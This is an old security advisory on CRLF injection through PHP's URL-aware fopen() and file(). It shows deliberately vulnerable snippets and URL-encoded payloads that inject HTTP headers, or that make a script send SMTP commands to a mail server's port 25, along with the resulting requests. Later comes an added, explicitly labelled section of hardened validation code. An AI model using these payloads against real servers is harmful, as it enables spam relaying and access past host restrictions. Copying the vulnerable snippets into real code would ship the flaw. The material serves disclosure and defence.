[UNIX] PHP fopen() CRLF Injection
From: support@securiteam.com  Date: 09/11/02
From: support@securiteam.com To: list@securiteam.com Date: Wed, 11 Sep 2002 17:07:07 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PHP fopen() CRLF Injection
------------------------------------------------------------------------
SUMMARY
PHP is a widely used Open Source general-purpose scripting language that
is especially suited for Web development and can be embedded into HTML.
Its syntax draws upon C, Java, and Perl, and is easy to learn. PHP runs on
many different platforms and can be used as a standalone executable or as
a module under a variety of Web servers. It has excellent support for
databases, XML, LDAP, IMAP, Java, various Internet protocols, and general
data manipulation, and is extensible via its powerful API.
fopen(), file() and other functions in PHP have a vulnerability that makes
it possible to add extra HTTP headers to the HTTP requests they send.
Attackers may use it to escape certain restrictions, such as which host on a
web server is accessed. In some cases this vulnerability even allows
arbitrary network connections, turning some PHP scripts into proxies and
open mail relays.
DETAILS
Vulnerable systems:
* PHP versions 4.1.2, 4.2.2, 4.2.3, latest CVS, possibly others
PHP has several functions that take filenames as one of their arguments:
fopen(), file() and some others. If allow_url_fopen is set to On in
php.ini, those functions also accept URLs instead of regular files, and
they connect to the server in question with the correct protocol. This
functionality is vulnerable to some CRLF Injection attacks.
1) We start with the simple attacks. Let us say that this PHP snippet is
saved as snippet.php:
<?php
// Relies on register_globals=On: $sunnan and $vind come straight from the
// query string and are placed in the URL without any encoding.
echo '<pre>';
print_r(file("http://www.site1.st/api?sunnan=$sunnan&vind=$vind"));
echo '</pre>';
?>
If an attacker surfs to:
snippet.php?sunnan=visby&vind=gotland%20HTTP/1.0%0D%0AHost%3A%20www.site2.st%0D%0AUser-Agent%3A%20Ulf/0.0%0D%0AReferer%3A%20http%3A%2F%2Fwww.gnuheter.org%2F%0D%0ACookie%3A%20user%3Dulf%0D%0A%0D%0A
This HTTP query will be sent to www.site1.st:
GET /api?sunnan=visby&vind=gotland HTTP/1.0
Host: www.site2.st
User-Agent: Ulf/0.0
Referer: http://www.gnuheter.org/
Cookie: user=ulf

 HTTP/1.0
Host: www.site1.st
User-Agent: PHP/4.1.2
As you can see, the real headers from PHP are sent as well, but the web
server ignores them, because the injected double CRLF before them marks the
end of the headers.
Using this technique, we can add arbitrary user agents, referrers, and
cookies. We can also break out of restrictions and access site2.st instead
of the site site1.st that snippet.php tries to restrict us to, if site1.st
and site2.st are virtual hosts on the same machine.
2) If the PHP script is even worse, like this one called dotcom.php:
<?php
// $url comes straight from the query string (register_globals=On) and is
// handed to fopen() without any check of scheme, host or port.
$fp = fopen($url, 'r');
fpassthru($fp);
?>
We can connect to arbitrary ports and send (almost) arbitrary commands,
thus turning the dotcom.php script into a proxy and an open mail relay.
If we surf to:
dotcom.php?url=http%3A%2F%2Fmail.site1.st%3A25%2F+HTTP/1.0%0D%0AHELO+my.own.machine%0D%0AMAIL+FROM%3A%3Cme%40my.own.machine%3E%0D%0ARCPT+TO%3A%3Cinfo%40site1.st%3E%0D%0ADATA%0D%0Ai+will+never+say+the+word+PROCRASTINATE+again%0D%0A.%0D%0AQUIT%0D%0A%0D%0A
The PHP interpreter will connect to mail.site1.st on port 25, and send the
following commands:
GET / HTTP/1.0
HELO my.own.machine
MAIL FROM:<me@my.own.machine>
RCPT TO:<info@site1.st>
DATA
i will never say the word PROCRASTINATE again
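The two scripts above both hand raw query-string data to a URL-aware function. As an added example that is not part of the advisory, here are hardened replacements for both in current PHP: for snippet.php, each value is rejected if it carries a control character and percent-encoded with rawurlencode() before it is placed in a URL the script owns; for dotcom.php, the user-supplied URL is checked for control characters and spaces, parsed, matched against a scheme and host allowlist with no explicit port, and rebuilt from the validated parts. The function names are my own; host and parameter names come from the advisory.

```php
<?php
// Added example, not part of the advisory: hardened replacements for the two
// scripts above, written for current PHP. Function names are assumptions.

// Rejects CR, LF and other control characters, then percent-encodes the value
// so it can never end the request line or start a new header.
function safe_query_param(string $value): string
{
    if (preg_match('/[\x00-\x1F\x7F]/', $value)) {
        throw new InvalidArgumentException('control character in parameter');
    }
    return rawurlencode($value);
}

// Case 1 (snippet.php): the script owns the base URL; only the values are user input.
function build_api_url(array $params): string
{
    $pairs = [];
    foreach ($params as $name => $value) {
        $pairs[] = rawurlencode($name) . '=' . safe_query_param($value);
    }
    return 'http://www.site1.st/api?' . implode('&', $pairs);
}

// Case 2 (dotcom.php): the whole URL is user input, so it is checked for control
// characters and spaces, parsed, matched against an allowlist and then rebuilt.
function validate_fetch_url(string $url, array $allowed_hosts): string
{
    if (preg_match('/[\x00-\x20\x7F]/', $url)) {
        throw new InvalidArgumentException('control character or space in URL');
    }
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        throw new InvalidArgumentException('unparseable URL');
    }
    $scheme = strtolower($p['scheme']);
    $host   = strtolower($p['host']);
    // http/https only and no explicit port, so mail.site1.st:25 is refused
    if (!in_array($scheme, ['http', 'https'], true) || isset($p['port'])) {
        throw new InvalidArgumentException('scheme or port not allowed');
    }
    if (!in_array($host, $allowed_hosts, true)) {
        throw new InvalidArgumentException('host not allowed');
    }
    $query = isset($p['query']) ? '?' . $p['query'] : '';
    return $scheme . '://' . $host . ($p['path'] ?? '/') . $query;
}
// snippet.php: print_r(file(build_api_url(['sunnan' => $_GET['sunnan'] ?? '', 'vind' => $_GET['vind'] ?? ''])));
// dotcom.php:  fpassthru(fopen(validate_fetch_url($_GET['url'] ?? '', ['www.site1.st']), 'r'));
```

Both advisory payloads are refused before any socket is opened: the first because its decoded vind value contains CR and LF, the second because of the space after the path and the explicit port 25. Catch InvalidArgumentException at the call site and answer with a 400 rather than echoing the rejected value back.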
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.